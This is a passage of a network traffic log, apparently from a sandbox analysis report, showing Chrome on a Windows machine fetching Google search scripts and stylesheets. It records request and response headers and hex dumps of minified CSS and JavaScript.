2024-09-26 15:55:30 UTC	1134	OUT	GET /xjs/_/ss/k=xjs.hd.3K9kqFG9IbE.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAAAUADsJAABGAAAbABAAAAAAAAIAgAEAAAAAACABAAAAAmABAAAAAAACABAJAACgCAAAAIBACBAAgAAKIAQoQAIEiiAUAgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACAACAIwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAAAEgAAAMgAEyAAEAAAAAAABkAAAAAAAAAAAAAAAAAAAAAAAAAACAACAAoAAAAAAAAAAAAAAAAAAAAAAC/d=0/br=1/rs=ACT90oEAN8vKHPrZc1uQQW97laV6I-0P2A/m=syjv,syo3?xjs=s4 HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw== Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=6KcQD-DCOfwRwfuOQLqsCzAUJU8k-iB9YwwFvcmpYUrmT-aHqe4PSNibvvpIkBpozbJIJI-v9_gESduPkkQlck55ADmg5cE9fHUaLwta4beFwdGVUm5zcL1RSzLKJg-VgLu4GE6dK63vW0eMz5cLTFXR7tT0ATtzr7WhodeQZxheX1xtXdL_83w649qhq4-0ZM-Ufd-SBZ6X
2024-09-26 15:55:30 UTC	817	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 1689 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 26 Sep 2024 15:55:29 GMT Expires: Fri, 26 Sep 2025 15:55:29 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 26 Sep 2024 06:30:51 GMT Content-Type: text/css; charset=UTF-8 Vary: Accept-Encoding, Origin Age: 1 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:30 UTC	573	IN	Data Raw: 2e 4d 54 49 61 4b 62 2c 2e 4c 77 44 55 64 63 2c 2e 46 41 6f 45 6c 65 2c 2e 52 6c 54 43 50 64 2c 2e 77 50 4e 66 6a 62 2c 2e 63 61 4e 76 66 64 2c 2e 56 6e 6f 62 34 62 2c 2e 62 62 78 54 42 62 2c 2e 44 70 67 6d 4b 2c 2e 59 4b 55 68 66 62 2c 2e 75 4e 6e 76 62 2c 2e 61 56 73 5a 70 66 2c 2e 52 6f 4f 56 6d 66 2c 2e 64 49 66 76 51 64 2c 2e 56 33 45 7a 6e 2c 2e 45 6e 62 39 70 65 2c 2e 6d 59 75 6f 61 66 2c 2e 6b 4a 53 42 38 2c 2e 74 55 72 34 4b 63 2c 2e 69 51 4d 74 71 65 7b 2d 2d 59 69 34 4e 62 3a 76 61 72 28 2d 2d 6d 58 5a 6b 71 63 29 3b 2d 2d 70 45 61 30 42 63 3a 76 61 72 28 2d 2d 62 62 51 78 41 62 29 3b 2d 2d 6b 6c 6f 47 33 3a 76 61 72 28 2d 2d 6d 58 5a 6b 71 63 29 3b 2d 2d 59 61 49 65 4d 62 3a 76 61 72 28 2d 2d 58 4b 4d 44 78 63 29 3b 2d 2d 50 61 38 57 6c 62 3a Data Ascii: .MTIaKb,.LwDUdc,.FAoEle,.RlTCPd,.wPNfjb,.caNvfd,.Vnob4b,.bbxTBb,.DpgmK,.YKUhfb,.uNnvb,.aVsZpf,.RoOVmf,.dIfvQd,.V3Ezn,.Enb9pe,.mYuoaf,.kJSB8,.tUr4Kc,.iQMtqe{--Yi4Nb:var(--mXZkqc);--pEa0Bc:var(--bbQxAb);--kloG3:var(--mXZkqc);--YaIeMb:var(--XKMDxc);--Pa8Wlb:
2024-09-26 15:55:30 UTC	1116	IN	Data Raw: 76 65 7d 2e 59 70 63 44 6e 66 7b 70 61 64 64 69 6e 67 3a 30 20 31 36 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 59 70 63 44 6e 66 2e 48 47 31 64 76 64 7b 70 61 64 64 69 6e 67 3a 30 7d 2e 48 47 31 64 76 64 3e 2a 7b 70 61 64 64 69 6e 67 3a 30 20 31 36 70 78 7d 2e 57 74 56 35 6e 64 20 2e 59 70 63 44 6e 66 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 38 70 78 7d 2e 5a 74 30 61 35 65 20 2e 59 70 63 44 6e 66 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 38 70 78 7d 2e 47 5a 6e 51 71 65 20 2e 59 70 63 44 6e 66 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 33 70 78 7d 2e 45 70 50 59 4c 64 3a 68 6f 76 65 72 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 45 70 50 59 4c 64 2c 2e 43 42 38 6e 44 65 3a 68 6f 76 65 72 7b 63 75 72 73 6f 72 Data Ascii: ve}.YpcDnf{padding:0 16px;vertical-align:middle}.YpcDnf.HG1dvd{padding:0}.HG1dvd>*{padding:0 16px}.WtV5nd .YpcDnf{padding-left:28px}.Zt0a5e .YpcDnf{line-height:48px}.GZnQqe .YpcDnf{line-height:23px}.EpPYLd:hover{cursor:pointer}.EpPYLd,.CB8nDe:hover{cursor

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.16	49775	142.250.186.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:30 UTC	2259	OUT	GET /async/hpba?vet=10ahUKEwiHxL-h_OCIAxVy2AIHHQM3AsYQj-0KCBY..i&ei=64P1ZseiHfKwi-gPg-6IsAw&opi=89978449&yv=3&sp_imghp=false&sp_hpte=1&sp_hpep=1&stick=&cs=0&async=_basejs:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en.UzAaLIOvKPw.es5.O%2Fam%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s%2Fdg%3D0%2Fbr%3D1%2Frs%3DACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA,_basecss:%2Fxjs%2F_%2Fss%2Fk%3Dxjs.hd.3K9kqFG9IbE.L.B1.O%2Fam%3DJCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAAAUADsJAABGAAAbABAAAAAAAAIAgAEAAAAAACABAAAAAmABAAAAAAACABAJAACgCAAAAIBACBAAgAAKIAQoQAIEiiAUAgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACAACAIwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAAAEgAAAMgAEyAAEAAAAAAABkAAAAAAAAAAAAAAAAAAAAAAAAAACAACAAoAAAAAAAAAAAAAAAAAAAAAAC%2Fbr%3D1%2Frs%3DACT90oEAN8vKHPrZc1uQQW97laV6I-0P2A,_basecomb:%2Fxjs%2F_%2Fjs%2Fk%3 [TRUNCATED] Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw== Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
2024-09-26 15:55:30 UTC	1036	IN	HTTP/1.1 200 OK Version: 677663421 X-Content-Type-Options: nosniff Content-Type: text/plain; charset=UTF-8 Content-Disposition: attachment; filename="f.txt" Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Date: Thu, 26 Sep 2024 15:55:30 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-09-26 15:55:30 UTC	47	IN	Data Raw: 32 39 0d 0a 29 5d 7d 27 0a 32 31 3b 5b 22 38 6f 50 31 5a 72 6a 78 4c 37 6d 66 69 2d 67 50 71 62 79 38 63 41 22 2c 22 32 30 38 35 22 5d 0d 0a Data Ascii: 29)]}'21;["8oP1ZrjxL7mfi-gPqby8cA","2085"]
2024-09-26 15:55:30 UTC	50	IN	Data Raw: 32 63 0d 0a 63 3b 5b 32 2c 6e 75 6c 6c 2c 22 30 22 5d 31 62 3b 3c 64 69 76 20 6a 73 6e 61 6d 65 3d 22 4e 6c 6c 30 6e 65 22 3e 3c 2f 64 69 76 3e 0d 0a Data Ascii: 2cc;[2,null,"0"]1b;<div jsname="Nll0ne"></div>
2024-09-26 15:55:30 UTC	22	IN	Data Raw: 31 30 0d 0a 63 3b 5b 39 2c 6e 75 6c 6c 2c 22 30 22 5d 30 3b 0d 0a Data Ascii: 10c;[9,null,"0"]0;
2024-09-26 15:55:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.16	49777	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:30 UTC	1720	OUT	GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/m=aLUfP?xjs=s4 HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
2024-09-26 15:55:30 UTC	828	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 1521 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 26 Sep 2024 08:56:14 GMT Expires: Fri, 26 Sep 2025 08:56:14 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 26 Sep 2024 06:30:51 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding, Origin Age: 25156 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:30 UTC	562	IN	Data Raw: 74 68 69 73 2e 5f 68 64 3d 74 68 69 73 2e 5f 68 64 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 77 28 22 61 4c 55 66 50 22 29 3b 0a 76 61 72 20 44 71 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 53 70 3d 61 7d 3b 76 61 72 20 45 71 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 42 6e 2e 63 61 6c 6c 28 74 68 69 73 2c 61 2e 4d 61 29 3b 76 61 72 20 62 3d 74 68 69 73 3b 74 68 69 73 2e 77 69 6e 64 6f 77 3d 61 2e 73 65 72 76 69 63 65 2e 77 69 6e 64 6f 77 2e 67 65 74 28 29 3b 74 68 69 73 2e 74 61 3d 74 68 69 73 2e 53 70 28 29 3b 74 68 69 73 2e 6f 61 3d 77 69 6e 64 6f 77 2e 6f 72 69 65 6e 74 61 74 69 6f 6e 3b 74 68 69 73 2e 6b 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 Data Ascii: this._hd=this._hd\|\|{};(function(_){var window=this;try{_.w("aLUfP");var Dqb=function(a){this.Sp=a};var Eqb=function(a){_.Bn.call(this,a.Ma);var b=this;this.window=a.service.window.get();this.ta=this.Sp();this.oa=window.orientation;this.ka=function(){va
2024-09-26 15:55:30 UTC	959	IN	Data Raw: 69 73 2e 48 58 61 28 29 26 26 74 68 69 73 2e 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6f 72 69 65 6e 74 61 74 69 6f 6e 63 68 61 6e 67 65 22 2c 0a 74 68 69 73 2e 6b 61 29 7d 3b 5f 2e 43 28 45 71 62 2c 5f 2e 42 6e 29 3b 45 71 62 2e 47 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 73 65 72 76 69 63 65 3a 7b 77 69 6e 64 6f 77 3a 5f 2e 45 6e 7d 7d 7d 3b 5f 2e 6d 3d 45 71 62 2e 70 72 6f 74 6f 74 79 70 65 3b 5f 2e 6d 2e 61 64 64 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 4e 64 2e 61 64 64 28 61 29 7d 3b 5f 2e 6d 2e 72 65 6d 6f 76 65 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 4e 64 2e 64 65 6c 65 74 65 28 61 29 7d 3b 0a 5f 2e 6d 2e 53 70 3d 66 75 Data Ascii: is.HXa()&&this.window.addEventListener("orientationchange",this.ka)};_.C(Eqb,_.Bn);Eqb.Ga=function(){return{service:{window:_.En}}};_.m=Eqb.prototype;_.m.addListener=function(a){this.Nd.add(a)};_.m.removeListener=function(a){this.Nd.delete(a)};_.m.Sp=fu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.16	49779	216.58.212.142	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:30 UTC	776	OUT	GET /log?format=json&hasfast=true HTTP/1.1 Host: play.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw== Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
2024-09-26 15:55:31 UTC	270	IN	HTTP/1.1 400 Bad Request Date: Thu, 26 Sep 2024 15:55:31 GMT Content-Type: text/html; charset=UTF-8 Server: Playlog Content-Length: 1555 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:31 UTC	1120	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 400 (Bad Request)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-
2024-09-26 15:55:31 UTC	435	IN	Data Raw: 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3e 3c 73 70 61 6e Data Ascii: pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.16	49782	142.250.186.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:30 UTC	1296	OUT	GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/m=sy1em,P10Owf,sy1de,sy1dc,syr0,gSZvdb,sy10q,sy10p,WlNQGd,syr5,syr2,syr1,syqz,DPreE,sy112,sy110,nabPbb,sy10k,sy10i,syjv,syo3,CnSW2d,kQvlef,sy111,fXO0xe?xjs=s4 HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw== Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
2024-09-26 15:55:31 UTC	829	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 24979 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 26 Sep 2024 08:56:13 GMT Expires: Fri, 26 Sep 2025 08:56:13 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 26 Sep 2024 06:30:51 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding, Origin Age: 25158 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:31 UTC	561	IN	Data Raw: 74 68 69 73 2e 5f 68 64 3d 74 68 69 73 2e 5f 68 64 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 4b 24 63 3d 5f 2e 45 64 28 22 50 31 30 4f 77 66 22 2c 5b 5f 2e 67 71 5d 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 77 28 22 50 31 30 4f 77 66 22 29 3b 0a 76 61 72 20 47 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 41 2e 63 61 6c 6c 28 74 68 69 73 2c 61 2e 4d 61 29 3b 74 68 69 73 2e 6b 61 3d 74 68 69 73 2e 67 65 74 44 61 74 61 28 22 63 6d 65 70 22 29 2e 4b 62 28 29 3b 74 68 69 73 2e 4f 62 3d 61 2e 73 65 72 76 69 63 65 2e 4f 62 3b 74 68 69 73 2e 64 61 74 61 3d 61 2e 54 64 2e 74 64 61 7d 3b 5f 2e 43 28 Data Ascii: this._hd=this._hd\|\|{};(function(_){var window=this;try{_.K$c=_.Ed("P10Owf",[_.gq]);}catch(e){_._DumpException(e)}try{_.w("P10Owf");var GD=function(a){_.A.call(this,a.Ma);this.ka=this.getData("cmep").Kb();this.Ob=a.service.Ob;this.data=a.Td.tda};_.C(
2024-09-26 15:55:31 UTC	1390	IN	Data Raw: 4a 75 28 29 29 26 26 28 28 63 3d 61 2e 64 61 74 61 29 3d 3d 6e 75 6c 6c 3f 30 3a 63 2e 4a 75 28 29 29 26 26 28 62 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 62 2e 4a 75 28 29 29 21 3d 3d 61 2e 64 61 74 61 2e 4a 75 28 29 7c 7c 61 2e 4f 62 2e 6b 61 28 29 2e 6f 61 28 61 2e 67 65 74 52 6f 6f 74 28 29 2e 65 6c 28 29 2c 32 29 2e 6c 6f 67 28 21 30 29 7d 3b 47 44 2e 70 72 6f 74 6f 74 79 70 65 2e 48 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 4f 62 2e 6b 61 28 29 2e 6b 61 28 61 2e 71 62 2e 65 6c 28 29 29 2e 6c 6f 67 28 21 30 29 3b 5f 2e 6e 66 28 64 6f 63 75 6d 65 6e 74 2c 5f 2e 54 78 63 29 7d 3b 47 44 2e 70 72 6f 74 6f 74 79 70 65 2e 43 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 4f 62 2e 6b 61 28 29 2e 6b 61 28 61 2e 71 62 2e 65 6c 28 29 Data Ascii: Ju())&&((c=a.data)==null?0:c.Ju())&&(b==null?void 0:b.Ju())!==a.data.Ju()\|\|a.Ob.ka().oa(a.getRoot().el(),2).log(!0)};GD.prototype.Ha=function(a){this.Ob.ka().ka(a.qb.el()).log(!0);_.nf(document,_.Txc)};GD.prototype.Ca=function(a){this.Ob.ka().ka(a.qb.el()
